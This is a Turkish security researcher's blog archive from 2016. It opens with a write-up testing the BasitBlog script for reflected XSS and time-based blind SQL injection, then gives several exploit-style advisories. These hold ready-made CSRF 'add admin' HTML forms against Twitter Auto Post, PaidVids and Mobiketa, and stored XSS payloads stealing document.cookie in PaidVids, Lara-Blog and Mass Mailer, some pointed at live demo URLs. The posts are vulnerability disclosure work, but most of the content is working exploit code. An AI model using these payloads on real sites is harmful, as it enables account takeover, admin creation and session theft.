29 Ağustos 2016 Pazartesi

BasitBlog Güvenlik Testi

08:29 Posted by Unknown



Selamlar,

Burayı üzün süre önce unutmuştum amma ve lakin LYK2016'da Ömer in 'bro senin blog neydi' demesiyle irkildim. Çünkü blogum yoktu! Bende burayı hatırlayıp verdim hızlıca. Bugün de domaini alıp blogu artık .com vs tarzı bir şeye mi dönüştürsem dedim. Domaini vs sonraya bırakıp blog scriptlerine bakmaya başladım. Wordpress, Blogger artık elinizi sallasanız denk geldiğiniz scriptler olduğundan Github gibi yerlerde aradım 1-2 şey ve bir Türk arkadaşın yazdığı scripte denk geldim. Scripti 'basitblog' olarak isimlendirmiş. Bakmak isteyenler aha da buraya tıklayarak bakabilirler nasıl bir şey olduğuna.

Bende locale alıp biraz üzerinde alıştırma yapmak istedim. Kaynak kod incelemesi vs değil bu ancak zafiyetlerin kaynaklandığı kod parçalarını da koyacağım yazıya.

Öncelikle kurulum kısmına Github wikisinden ulaşabilirsiniz. Biz direkt kurup çalıştırdığımızı varsayalım. Karşımıza aşağıdaki gibi bir ekran çıkıyor:

Yönetim Anasayfası

Şimdi burada ilk Türk hackerlarının en sevdiği kısım olan arama kısmını kurcalamaya başladım tabiki. Herhangi bir arama yaptığımızda yazdığımız arama kelimesi 'hizliara' değişkeni ile bize yansıtılıyor. Burada yaptığım ilk şey XSS denemek oldu. İlk aradığım şey 'murat' kelimesiydi ve test amaçlı idi ardından 'murat'"><svg/onload=prompt(1)>' olarak aradım ve işte alert karşımdaydı!

XSS Alert

 Zafiyete neden olan kod parçacığı da şu şekilde:

GET değişkeninde filtreleme yok



 Gördüğümüz gibi bir basit bir Reflected XSS zafiyeti burada bulunmakta ancak authenticated olduğu için tehlike arz etmekte.

Şimdi bir diğer XSS açığımıza geçelim.

Diğer XSS açığımız yönetim panelinin giriş kısmında. Burada ilk önce kaynak kodu gösterelim.

Aşağıda görebileceğiniz gibi 'eposta' değişkeninde herhangi bir filtreleme yok. Burada giriş sayfasında eposta değişkeni kısmına yazacağımız herhangi bir xss payloadı xss alerti almamız için yeterlidir.

Korunmasız 'eposta' değişkeni


 Şimdi yukarıda kullandığımız payloadı kullanarak alert almaya çalışalım.

Giriş kısmında aldığımız XSS alert

 Ayrıca bu kod parçacığında dikkat çeken bir diğer kısım SQL sorgusu. POST edilen 'eposta' değişkeni yine korunmasız ve burada Blind SQLi açığı mevcut.

Blind SQLi olan kısım


 Burada bir eposta değişkenine polyglot olarak tabir edilen SQL Injectionu tespit etmek için kullanılan payloadı burada deneyeceğiz.

Payloadımız:

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

 Bu payloadı kullandığımızda sayfa 6 saniye geç yüklenecek ve biz burada SQLi bugu olduğunu anlayacağız.

Bu incelememiz bu kadar.

Feedbackleri yorumları bekliyorum.

Kolay gelsin!









27 Haziran 2016 Pazartesi

Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit

05:37 Posted by Unknown
<!--
# Exploit Title: Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://codecanyon.net/item/twitter-auto-post-multi-accounts/16794863?s_rank=1
# Demo Page: http://tw.cozola.com/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/index.php/Users/postUpdate" method="POST">
      <input type="hidden" name="admin" value="1" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="username" value="newadmin" />
      <input type="hidden" name="password" value="newpass" />
      <input type="hidden" name="repassword" value="newpass" />
      <input type="hidden" name="fid" value="hacked&#95;admin" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="token" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->

13 Haziran 2016 Pazartesi

PaidVids - Multiple Vulnerabilities

11:38 Posted by Unknown
# Exploit Title: PaidVids - Multiple Vulnerabilities
# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://paidtasks.net/
# Demo Page: http://video.paidtasks.net/admin-panel/
# Version: 1.0


###########################

# CSRF Add Admin Exploit:

< -- bug code started -- >

<html>
  <body>
    <form action="http://video.paidtasks.net/admin-panel/index.php?x=users&edit=7" method="POST">
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="email" value="murrat&#64;protonmail&#
46;com" />
      <input type="hidden" name="pass" value="" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="country" value="82" />
      <input type="hidden" name="coins" value="0&#46;20" />
      <input type="hidden" name="admin" value="1" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

< -- end of the bug code -- >

###########################


# Stored XSS Vulnerability:

Paidvids is vulnerable to a stored XSS when an user is edited with an
malicious payload on the username field. The javascript payload is executed when another admin or editor tries to use the
"All Members" section from left bar.

# How To Exploit:

Go to the admin panel and edit a existed user. Change the "username" to :
"><img src="c" onerror="alert(document.cookie)">  after this, go to this members page.
Here is your alert.

PoC: http://prntscr.com/bew0df

###########################

Lara-Blog Stored XSS Vulnerability

11:38 Posted by Unknown
# Exploit Title: Lara-Blog Stored XSS Vulnerability
# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://xcoder.io/demo/
# Demo Page: http://xcoder.io/demo/lara-blog/dashboard
# Version: 1.0

#########################

1. Vulnerability Summary:

Larablog is vulnerable to a stored XSS when an user is created with an
malicious payload on the Full name field.
The javascript payload is executed when another admin or editor tries to use the
"Users" section from left bar.

2. How to exploit:

Go to the admin panel and create a new user or edit a existed user. Change the "Full name" to :
"><img src="c" onerror="alert(document.
cookie)">  after this, go to the "Users" section or "Dashboard"
Here is your alert.

PoC: http://prntscr.com/bevbyh


3. Vulnerable Versions:

All versions of Lara-Blog is vulnerable for this bug.

#########################

Mass Mailer - Stored XSS Vuln.

11:38 Posted by Unknown
# Exploit Title: Mass Mailer Stored XSS Vuln.
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.brightery.com.eg/
# Demo Page: http://demo.brightery.com.eg/mass-mailer
# Version: 1.0

# Exploit:

< -- bug code started -- >

Go to the admin page. Add server from the top right menu. Use the payload: '"><svg/onload=confirm(
document.domain)>

And go to http://[SITE]/[script_path]/admin/servers

Here is your alert!

< -- end of the bug code -- >

#########################

12 Haziran 2016 Pazar

Mobiketa 1.0 - CSRF Add Admin Exploit

08:39 Posted by Unknown
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST"
enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email"
value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->